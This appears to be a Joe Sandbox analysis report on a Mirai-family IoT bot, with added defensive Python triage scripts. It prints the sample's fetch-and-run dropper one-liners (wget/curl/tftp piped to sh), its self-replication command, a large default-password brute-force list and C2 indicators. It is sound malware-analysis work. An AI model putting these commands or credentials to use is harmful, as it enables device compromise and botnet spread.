
Linux Analysis Report
rep.ppc.elf

Overview

General Information

Sample name:rep.ppc.elf
Analysis ID:1653457
MD5:e9082b6cc402fc736c9193d14ae6d5f4
SHA1:7778718ba1f24d948a6e8ac4cc1c54bf31722ee6
SHA256:a187c42abbd1f889f24e082a5b436a614d09bfea86271e5bfcae1a08b9d4381a
Tags: elf, user-abuse_ch

Detection

Mirai
Score:80
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample tries to kill multiple processes (SIGKILL)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

(Classification chart. Its axes are Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader and Miner, and its verdict scale runs clean / suspicious / malicious. The verdict for this sample is carried by the classification label mal80.spre.troj.linELF@0/0@9/0 given below: malicious with score 80, spreading, trojan.)
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1653457
Start date and time:2025-04-01 09:40:22 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:rep.ppc.elf
Detection:MAL
Classification:mal80.spre.troj.linELF@0/0@9/0
Command:/tmp/rep.ppc.elf
PID:5429
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • rep.ppc.elf (PID: 5429, Parent: 5350, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/rep.ppc.elf (this MD5 is not the submitted sample's e9082b6cc402fc736c9193d14ae6d5f4; the stack strings under System Summary show the PowerPC binary was started through /usr/bin/qemu-ppc via binfmt, so the hashed process image is most likely the emulator rather than rep.ppc.elf)
  • gdm3 New Fork (PID: 5458, Parent: 1400)
  • Default (PID: 5458, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5466, Parent: 1400)
  • Default (PID: 5466, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • rm (PID: 5468, Parent: 2984, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec7c2e14-9c4d-40f3-9704-8617ab831fb4
  • xfwm4 (PID: 5470, Parent: 2984, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
  • xfdesktop (PID: 5472, Parent: 2984, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
  • xfce4-panel (PID: 5474, Parent: 2984, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
  • xfwm4 (PID: 5476, Parent: 2984, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
  • xfdesktop (PID: 5478, Parent: 2984, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
  • xfce4-panel (PID: 5480, Parent: 2984, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
  • systemd New Fork (PID: 5492, Parent: 1)
  • systemd-user-runtime-dir (PID: 5492, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
Malware family reference

Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Yara matches

Source                                            | Rule                | Description         | Author
rep.ppc.elf                                       | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
rep.ppc.elf                                       | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5435.1.00007fecb8001000.00007fecb8018000.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
(1 further entry is not included in this export.)

The three memory matches are the same r-x mapping (00007fecb8001000-00007fecb8018000) in the parent process and its two forked copies, so they confirm one image, not three distinct payloads.

No Suricata rule has matched

AV Detection

Source: rep.ppc.elf | Avira: detected
Source: rep.ppc.elf | Virustotal: Detection: 50%
Source: rep.ppc.elf | ReversingLabs: Detection: 47%
Source: rep.ppc.elf | String (a run of adjacent strings from the binary, extracted without separators; it is split below only where the boundary is unambiguous):
  /bin/busybox
  enableshlinuxshellping ;sh   (unseparated run; in Mirai-derived telnet loaders these words are sent after login to reach a shell)
  usage: busybox
  /bin/busybox hostname PBOC
  /bin/busybox echo > .b && sh .b && cd .k
  sh .k
  /bin/busybox wget http:///wget.sh -O- | sh;
  /bin/busybox tftp -g -r tftp.sh -l- | sh;
  /bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;
  curl http:///curl.sh -o- | sh
  /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
  The People's
  incorrectinvalidbadwrongfaildeniederrorretry   (unseparated run: incorrect, invalid, bad, wrong, fail, denied, error, retry; the words a brute-forcer looks for in the remote response to recognise a failed login)
  GET /dlr. HTTP/1.0

What this string block shows: the sample carries the loader one-liner for fifteen architectures (the rep.<arch> siblings, each started with the selfrep argument), four fetch methods (busybox wget, busybox tftp, busybox ftpget and curl), a hostname change to PBOC, and the request line GET /dlr. HTTP/1.0 (the suffix after "dlr." is not present in the static string; in the leaked Mirai loader the downloader stubs are named dlr.<arch>). Both URL templates have an empty host (http:///wget.sh, http:///curl.sh), so the download server is not recoverable from the static strings and these URLs are not usable indicators on their own.
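The string block above is the kind of artifact that is worth parsing rather than eyeballing. The following Python is an added illustration (not Joe Sandbox, Mirai or the sample's own code) that runs a `strings`-style extraction over a byte blob and then pulls out the fetch tools, the URL templates and their hosts, and the per-architecture sibling list. The byte blob is constructed here from the strings the report quotes, laid out as NUL-terminated C strings; it was not carved from rep.ppc.elf, and the regexes and thresholds are this example's assumptions.

```python
"""Static triage of the dropper strings: recover the shell one-liners, the
fetch tools, the URL templates and the per-architecture sibling list.
Added illustration, not Joe Sandbox or Mirai code."""
import re

# Constructed sample: the dropper strings quoted in the report, laid out as
# NUL-terminated C strings the way they sit in a binary's .rodata. These bytes
# are assembled here for the example; they were not carved from rep.ppc.elf.
SAMPLE_RODATA = b"\x00".join([
    b"/bin/busybox",
    b"/bin/busybox hostname PBOC",
    b"/bin/busybox echo > .b && sh .b && cd .k",
    b"sh .k",
    b"/bin/busybox wget http:///wget.sh -O- | sh;",
    b"/bin/busybox tftp -g -r tftp.sh -l- | sh;",
    b"/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;",
    b"curl http:///curl.sh -o- | sh",
    b"/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; "
    b"./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; "
    b"./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; "
    b"./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; "
    b"./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep",
    b"GET /dlr. HTTP/1.0",
    b"\x01\x02ab",          # short non-string junk; dropped by the length rule
]) + b"\x00"

SEP = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")     # shell list/pipe operators
URL = re.compile(r"(?:https?|tftp|ftp)://([^/\s]*)(?:/\S*)?")
SELFREP = re.compile(r"\./rep\.([A-Za-z0-9_]+)\s+selfrep")
FETCHERS = {"wget", "tftp", "ftpget", "curl"}


def extract_strings(data, min_len=4):
    """Same rule as `strings -n min_len`: runs of printable ASCII."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def split_commands(line):
    """Break a one-liner on ; && || | into its simple commands."""
    return [c for c in SEP.split(line) if c]


def fetch_tools(strings):
    """Download utilities invoked directly or as a BusyBox applet."""
    found = set()
    for s in strings:
        for cmd in split_commands(s):
            words = cmd.split()
            if not words:
                continue
            if words[0].endswith("busybox") and len(words) > 1:
                tool = words[1]                  # /bin/busybox <applet> ...
            else:
                tool = words[0].rsplit("/", 1)[-1]
            if tool in FETCHERS:
                found.add(tool)
    return found


def payload_urls(strings):
    """(url, host) pairs; an empty host means the template is completed at run time."""
    return [(m.group(0), m.group(1)) for s in strings for m in URL.finditer(s)]


def selfrep_targets(strings):
    """Architecture suffixes of the sibling binaries launched with 'selfrep'."""
    return [m.group(1) for s in strings for m in SELFREP.finditer(s)]


def triage(data):
    strings = extract_strings(data)
    urls = payload_urls(strings)
    return {
        "busybox_strings": sum("busybox" in s for s in strings),
        "fetch_tools": sorted(fetch_tools(strings)),
        "payload_urls": [u for u, _ in urls],
        "hostless_urls": [u for u, host in urls if not host],
        "selfrep_targets": selfrep_targets(strings),
        "loader_request": any(s.startswith("GET /") and " HTTP/1." in s for s in strings),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RODATA).items():
        print(f"{key}: {value}")
```

The host check is the part worth keeping: a URL whose host is empty in the static strings tells you the loader address is filled in elsewhere (at run time, or by the C2), so blocking `http:///wget.sh` as an indicator would be meaningless.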

Networking

Source: global traffic | DNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
Source: global traffic | DNS traffic detected: malformed DNS query: qittler.ru. [malformed]
Source: global traffic | DNS traffic detected: malformed DNS query: polizei.su. [malformed]
Source: global traffic | DNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
Source: global traffic | DNS traffic detected: malformed DNS query: mykittler.ru. [malformed]
Source: global traffic | DNS traffic detected: malformed DNS query: kittlerer.ru. [malformed]
Source: global traffic | DNS traffic detected: malformed DNS query: cat-are-here.ru. [malformed]
  The report does not say what is malformed about these seven queries; none of them resolved (IP "unknown" in the domain table), whereas the plain query for cuttiecats.ru did resolve to 45.135.194.73.
Source: global traffic | TCP traffic: 192.168.2.13:39384 -> 45.135.194.73:34411
  45.135.194.73 is the address cuttiecats.ru resolved to, and 34411 is not a registered service port, so this is the connection to treat as the C2 channel.
Source: /tmp/rep.ppc.elf (PID: 5429) | Socket: 127.0.0.1:13301
  A loopback bind like this is consistent with the single-instance lock in the Mirai source (port 48101 in the original; variants change the port).
Source: unknown | TCP traffic detected without corresponding DNS query, 41 destinations (no name lookup preceded any of them, which is what Mirai's random-target scanner looks like on the wire):
  86.126.115.122, 163.77.150.110, 211.98.97.40, 97.51.54.229, 43.122.107.180, 16.204.78.196, 157.112.89.233,
  9.87.19.223, 89.214.6.78, 68.51.53.16, 113.143.169.220, 115.165.9.124, 14.162.101.86, 221.190.48.86,
  108.181.143.40, 162.142.13.217, 63.60.6.42, 209.70.82.201, 12.150.166.125, 218.59.146.160, 41.140.224.47,
  220.90.22.208, 146.89.161.198, 130.97.240.159, 69.149.103.63, 171.114.217.29, 20.252.72.121, 200.187.88.217,
  59.72.61.169, 216.152.21.20, 213.62.46.246, 149.219.194.158, 109.7.79.41, 206.215.173.153, 199.57.122.64,
  129.247.171.52, 112.249.18.61, 96.179.233.183, 146.40.239.218, 48.112.235.132, 188.98.241.185
Source: global traffic | DNS traffic detected: DNS query: cuttiecats.ru
Source: global traffic | DNS traffic detected: DNS query: kittlez.ru. [malformed]
Source: global traffic | DNS traffic detected: DNS query: qittler.ru. [malformed]
Source: global traffic | DNS traffic detected: DNS query: polizei.su. [malformed]
Source: global traffic | DNS traffic detected: DNS query: cuttiecats.ru. [malformed]
Source: global traffic | DNS traffic detected: DNS query: mykittler.ru. [malformed]
Source: global traffic | DNS traffic detected: DNS query: kittlerer.ru. [malformed]
Source: global traffic | DNS traffic detected: DNS query: cat-are-here.ru. [malformed]
Source: rep.ppc.elf | String found in binary or memory: http:///curl.sh
Source: rep.ppc.elf | String found in binary or memory: http:///wget.sh
  Both URL strings have an empty host component; the download server is not present in the static strings.
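The two network signatures above ("TCP traffic detected without corresponding DNS query" and "traffic on non-standard ports") are easy to reproduce from a flow log plus the DNS answers, and once you have them the scanner is visible as many unresolved peers on one port while the C2 is the one resolved peer on an odd port. The Python below is an added example, not part of the report or of Joe Sandbox. The event list is constructed: the DNS answer for cuttiecats.ru and the connection to 45.135.194.73:34411 come from the report, the six other destinations are the first six unresolved addresses the report lists, and their destination port 23 and the local resolver line are assumptions made for the example (the report does not show ports for those flows). The STANDARD_PORTS set is likewise this example's choice, not the sandbox's list.

```python
"""Reproduce the sandbox's DNS-less TCP and non-standard-port findings from a
flow log, and turn the first one into a scanner heuristic.
Added illustration, not Joe Sandbox code."""
from collections import defaultdict
from ipaddress import ip_address

# Constructed event log (see the lead-in for which entries are from the report
# and which are assumptions). Tuples are:
#   ("dns", name, answered_ip)
#   ("tcp", src_ip, src_port, dst_ip, dst_port)
EVENTS = [
    ("dns", "cuttiecats.ru", "45.135.194.73"),
    ("tcp", "192.168.2.13", 39384, "45.135.194.73", 34411),   # from the report
    ("tcp", "192.168.2.13", 40001, "86.126.115.122", 23),     # port 23: assumption
    ("tcp", "192.168.2.13", 40002, "163.77.150.110", 23),
    ("tcp", "192.168.2.13", 40003, "211.98.97.40", 23),
    ("tcp", "192.168.2.13", 40004, "97.51.54.229", 23),
    ("tcp", "192.168.2.13", 40005, "43.122.107.180", 23),
    ("tcp", "192.168.2.13", 40006, "16.204.78.196", 23),
    ("tcp", "192.168.2.13", 40007, "192.168.2.1", 53),        # LAN resolver, ignored
]

# Ports treated as ordinary; anything else is "non-standard". This set is an
# assumption for the example, not the sandbox's own list.
STANDARD_PORTS = {21, 22, 23, 25, 53, 80, 123, 443, 2323, 8080}


def analyze(events, scan_threshold=5):
    """Return findings as tuples:
       ("non-standard-port", dst, port, resolved_name_or_None)
       ("scan-like", port, distinct_unresolved_destinations)"""
    resolved = {}                            # dst ip -> name it came from
    unresolved_by_port = defaultdict(set)    # port -> ips contacted without DNS
    findings = []
    for ev in events:
        if ev[0] == "dns":
            _, name, ip = ev
            resolved[ip] = name
            continue
        _, _src, _sport, dst, dport = ev
        if ip_address(dst).is_private:
            continue                         # LAN traffic is out of scope here
        name = resolved.get(dst)
        if name is None:
            # the sandbox's "TCP traffic detected without corresponding DNS query"
            unresolved_by_port[dport].add(dst)
        if dport not in STANDARD_PORTS:
            # the sandbox's "traffic on non-standard ports"; when the peer was
            # resolved by name this is the C2 candidate
            findings.append(("non-standard-port", dst, dport, name))
    for port, dsts in unresolved_by_port.items():
        if len(dsts) >= scan_threshold:
            # many distinct peers reached with no lookup on one port: scanning
            findings.append(("scan-like", port, len(dsts)))
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

With the constructed log this yields exactly two findings: the resolved peer cuttiecats.ru / 45.135.194.73 on port 34411, and six unresolved peers on port 23. Raise `scan_threshold` above the number of unresolved peers and only the C2 candidate remains.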

System Summary

Source: /tmp/rep.ppc.elf (PID: 5437) | SIGKILL sent, result: successful, to 44 PIDs:
  726, 727, 792, 884, 1563, 1745, 1805, 2961, 2964, 2984, 3069, 3114, 3132, 3134, 3146, 3147, 3153, 3158, 3181, 3183, 3185, 3203, 3220,
  5413, 5414, 5433, 5435, 5462, 5466, 5467, 5468, 5469, 5470, 5471, 5472, 5473, 5474, 5475, 5476, 5477, 5478, 5479, 5480, 5481
  Cross-referenced with the process tree under General Information: 2984 is xfce4-session (the parent of the rm, xfwm4, xfdesktop and xfce4-panel processes); 5466, 5468, 5470, 5472, 5474, 5476, 5478 and 5480 are the gdm3 fork, the rm invocation and the xfce desktop processes listed there; and 5433 and 5435 are the sample's own earlier copies, whose memory matched the Mirai Yara rules. The killer therefore does not spare its own siblings or the sandbox's desktop session. The kills succeeded because the sample ran as root (the stack environment strings below show USER=root with SUDO_USER=saturnino).
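Forty-four successful SIGKILLs from one PID is the behaviour behind the "kills multiple processes" signature, and the useful follow-up question is who the victims were relative to the killer. The Python below is an added example (not report or Joe Sandbox code) that takes a signal log and a process-tree snapshot, flags any sender above a kill threshold, and buckets its victims into the sender's own process tree, other processes the snapshot knows by name, and PIDs the snapshot never saw. The victim list is the one above; the gdm3/xfce entries and the root PID 5429 with parent 5350 come from the report's process list. The shape of the sample's own fork chain (5429 -> 5433 -> 5435 and 5437) is an assumption, since the behaviour graph shows one child and three grandchildren without printing their PIDs, and the single SIGTERM from xfce4-session is made up to show the threshold ignoring it.

```python
"""Flag a process that SIGKILLs many others and sort its victims by where they
sit in the process tree. Added illustration; not Joe Sandbox code."""
from collections import defaultdict

# Process tree as pid -> (ppid, name). The gdm3/xfce entries and the sample's
# root PID/parent come from the report's process list. The shape of the sample's
# own fork chain (5429 -> 5433 -> 5435 and 5437) is an assumption for this
# example: the behaviour graph shows one child and three grandchildren but does
# not print their PIDs.
TREE = {
    1: (0, "systemd"),
    1400: (1, "gdm3"),
    2984: (1400, "xfce4-session"),
    5466: (1400, "Default"),
    5468: (2984, "rm"),
    5470: (2984, "xfwm4"),
    5472: (2984, "xfdesktop"),
    5474: (2984, "xfce4-panel"),
    5429: (5350, "rep.ppc.elf"),
    5433: (5429, "rep.ppc.elf"),
    5435: (5433, "rep.ppc.elf"),
    5437: (5433, "rep.ppc.elf"),
}

# The 44 targets of PID 5437's SIGKILLs, as listed in the report.
KILLED = [726, 727, 792, 884, 1563, 1745, 1805, 2961, 2964, 2984, 3069, 3114,
          3132, 3134, 3146, 3147, 3153, 3158, 3181, 3183, 3185, 3203, 3220,
          5413, 5414, 5433, 5435, 5462, 5466, 5467, 5468, 5469, 5470, 5471,
          5472, 5473, 5474, 5475, 5476, 5477, 5478, 5479, 5480, 5481]

# Constructed signal log: (sender pid, signal, target pid). The SIGTERM from
# xfce4-session is invented, to show that the threshold leaves it alone.
EVENTS = [(5437, "SIGKILL", t) for t in KILLED] + [(2984, "SIGTERM", 5470)]


def root_of(pid, tree=TREE):
    """Top-most ancestor of pid that is present in tree, or None if pid is unknown."""
    if pid not in tree:
        return None
    while tree[pid][0] in tree:
        pid = tree[pid][0]
    return pid


def mass_kill_report(events, tree=TREE, threshold=10):
    """Senders with at least `threshold` SIGKILL targets, each with its victims
    bucketed into: the sender's own process tree, other processes the snapshot
    knows (as (pid, name)), and PIDs absent from the snapshot."""
    by_sender = defaultdict(list)
    for sender, sig, target in events:
        if sig == "SIGKILL":
            by_sender[sender].append(target)
    report = {}
    for sender, targets in by_sender.items():
        if len(targets) < threshold:
            continue
        own_root = root_of(sender, tree)
        own, other, unknown = [], [], []
        for t in targets:
            r = root_of(t, tree)
            if r is None:
                unknown.append(t)
            elif r == own_root:
                own.append(t)
            else:
                other.append((t, tree[t][1]))
        report[sender] = {"count": len(targets), "own_tree": own,
                          "other_known": other, "unknown": unknown}
    return report


if __name__ == "__main__":
    for pid, r in mass_kill_report(EVENTS).items():
        print(pid, r["count"], "SIGKILLs; own tree:", r["own_tree"],
              "; known others:", r["other_known"], ";", len(r["unknown"]), "unknown")
```

On this input the only sender over the threshold is 5437, its own-tree victims are 5433 and 5435, and the named victims are xfce4-session and its children plus the gdm3 fork; the remaining 36 PIDs are not in the snapshot, which is the usual situation when the tree was captured after the kills, so treat "unknown" as "look them up in the full process log", not as benign.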
Source: initial sample | Strings containing 'busybox' found:
  /bin/busybox
  usage: busybox
  /bin/busybox hostname PBOC
  /bin/busybox echo >
  /bin/busybox wget http://
  /wget.sh -O- | sh;/bin/busybox tftp -g
  -r tftp.sh -l- | sh;/bin/busybox ftpget
  /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
  /bin/busybox echo -ne
  (the full concatenated dropper run, as already quoted under AV Detection)
  /bin/busybox echo -ne >> > .d
Source: initial sample | Strings containing potential weak password found: 54321, 654321, default, admin1234, service, password, guest, support, administrator, supervisor
Source: ELF static info, symbol of initial sample | .symtab present: no
Source: classification engine | Classification label: mal80.spre.troj.linELF@0/0@9/0
Source: /usr/bin/xfce4-session (PID: 5468) | Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec7c2e14-9c4d-40f3-9704-8617ab831fb4
  The process that ran rm is xfce4-session (parent PID 2984 in the process tree), not rep.ppc.elf: the desktop session is removing its own Thunar session file. The "Executes the rm command" signature is sandbox-environment noise, not sample behaviour.
Source: /tmp/rep.ppc.elf (PID: 5429) | Queries kernel information via 'uname'
Source: rep.ppc.elf | Binary or memory string: vmware
Source: rep.ppc.elf | Binary or memory string: vmware123
  Both strings sit inside the credential dictionary quoted below ("...smcadminsysadmvmwareprofense...", "...support123aerohiveadmin00vmware123..."): they are default passwords for brute-forcing, not a hypervisor check.
Source: rep.ppc.elf, 5429.1.000055d44376d000.000055d44381d000.rw-.sdmp (and the same region in PIDs 5433 and 5435) | Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: rep.ppc.elf, 5429.1.000055d44376d000.000055d44381d000.rw-.sdmp (and the same region in PIDs 5433 and 5435) | Binary or memory string: /etc/qemu-binfmt/ppc
Source: rep.ppc.elf, 5429.1.00007ffc1069d000.00007ffc106be000.rw-.sdmp (and the same region in PIDs 5433 and 5435) | Binary or memory string: /usr/bin/qemu-ppc
Source: rep.ppc.elf, 5429.1.00007ffc1069d000.00007ffc106be000.rw-.sdmp (and the same region in PIDs 5433 and 5435) | Binary or memory string: x&x86_64/usr/bin/qemu-ppc/tmp/rep.ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/rep.ppc.elf
  These four strings come from writable data and stack regions of the running process, not from the ELF file: they are the argv and environment of the launch. They show that the PowerPC binary was executed on an x86_64 host through /usr/bin/qemu-ppc registered via binfmt, as root via sudo from the user saturnino. A sample that inspects its own environment or /proc could use exactly these strings to detect emulation; nothing in this report shows that it did.
Source: rep.ppc.elf | Binary or memory string (a concatenated credential dictionary; the separators between entries were lost in extraction, and the run, which the export had wrapped onto two lines, is rejoined here): / nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter

Stealing of Sensitive Information

Source: Yara match | File source: rep.ppc.elf, type: SAMPLE
Source: Yara match | File source: 5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5435.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: rep.ppc.elf, type: SAMPLE
Source: Yara match | File source: 5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5435.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
MITRE ATT&CK matrix (as laid out by the sandbox; the number in parentheses is the count of matched signatures, and cells without a number are the matrix's placeholder techniques with no match)

Tactic               | Column 1                               | Column 2                             | Column 3
Reconnaissance       | Gather Victim Identity Information     | Credentials                          | Email Addresses
Resource Development | Scripting (1)                          | Domains                              | DNS Server
Initial Access       | Valid Accounts                         | Default Accounts                     | Domain Accounts
Execution            | Windows Management Instrumentation     | Scheduled Task/Job                   | At
Persistence          | Scripting (1)                          | Boot or Logon Initialization Scripts | Logon Script (Windows)
Privilege Escalation | Path Interception                      | Boot or Logon Initialization Scripts | Logon Script (Windows)
Defense Evasion      | File Deletion (1)                      | Rootkit                              | Obfuscated Files or Information
Credential Access    | Brute Force (1)                        | LSASS Memory                         | Security Account Manager
Discovery            | Security Software Discovery (11)       | Application Window Discovery         | Query Registry
Lateral Movement     | Remote Services                        | Remote Desktop Protocol              | SMB/Windows Admin Shares
Collection           | Data from Local System                 | Data from Removable Media            | Data from Network Shared Drive
Command and Control  | Non-Standard Port (1)                  | Non-Application Layer Protocol (1)   | Application Layer Protocol (1)
Exfiltration         | Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth          | Automated Exfiltration
Impact               | Service Stop (1)                       | Network Denial of Service            | Data Encrypted for Impact

The File Deletion (1) entry is the rm invocation attributed above to xfce4-session rather than to the sample.
                No configs have been found
Behavior graph (ID 1653457, sample rep.ppc.elf, start date 01/04/2025, architecture LINUX, score 80), rendered as text:
  • rep.ppc.elf starts, forks one child, and that child forks three further rep.ppc.elf processes; the signature "Sample tries to kill multiple processes (SIGKILL)" is attached to one of the three.
  • Network nodes: qittler.ru. [malformed], polizei.su. [malformed], and 48 other IPs or domains; "Sends malformed DNS queries" is attached to the polizei.su node.
  • Sample-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Mirai.
  • Also started in the sandbox session, from the session root rather than from the sample: xfce4-session -> rm, xfce4-session -> xfwm4, and 12 other processes.
